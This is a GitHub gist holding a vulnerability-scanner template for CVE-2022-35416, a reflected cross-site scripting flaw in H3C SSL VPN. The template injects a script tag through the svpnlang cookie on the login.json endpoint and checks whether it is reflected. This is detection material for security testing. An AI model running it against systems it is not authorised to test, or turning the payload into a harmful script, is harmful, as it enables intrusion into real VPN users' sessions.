Skip to content

Instantly share code, notes, and snippets.

@shelu16
Created July 13, 2022 14:32
Show Gist options
  • Save shelu16/8921dd857952cf9975b8620f1f4698af to your computer and use it in GitHub Desktop.
Save shelu16/8921dd857952cf9975b8620f1f4698af to your computer and use it in GitHub Desktop.
H3C_SSL_VPN_XSS(Reflected XSS) CVE-2022-35416 - Cross-Site Scripting
id: CVE-2022-35416
info:
name: H3C_SSL_VPN_XSS(Reflected XSS) CVE-2022-35416 - Cross-Site Scripting
author: 0x240x23elu
severity: medium
reference:
- https://github.com/safe3s/CVE-2022-35416
tags: H3C,xss
requests:
- raw:
- |
GET /wnm/login/login.json HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Cookie: svpnlang=<script>alert('XSS')</script>
matchers-condition: and
matchers:
- type: word
words:
- "<script>alert('XSS')</script>"
part: body
- type: status
status:
- 200
- type: word
words:
- "text/html"
part: header
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment